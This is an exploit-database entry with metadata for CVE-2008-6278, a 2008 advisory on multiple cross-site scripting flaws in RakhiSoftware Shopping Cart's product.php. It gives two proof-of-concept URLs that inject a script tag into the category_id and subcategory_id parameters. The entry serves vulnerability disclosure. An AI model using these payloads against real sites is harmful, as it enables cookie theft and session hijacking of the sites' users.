RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities
Author: Charalambous Glafkos
type: webapps
platform: php
port:
date_added: 2008-11-28
date_updated: 2014-03-31
verified: 1
codes: CVE-2008-6278;OSVDB-50326
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/32563/info
RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>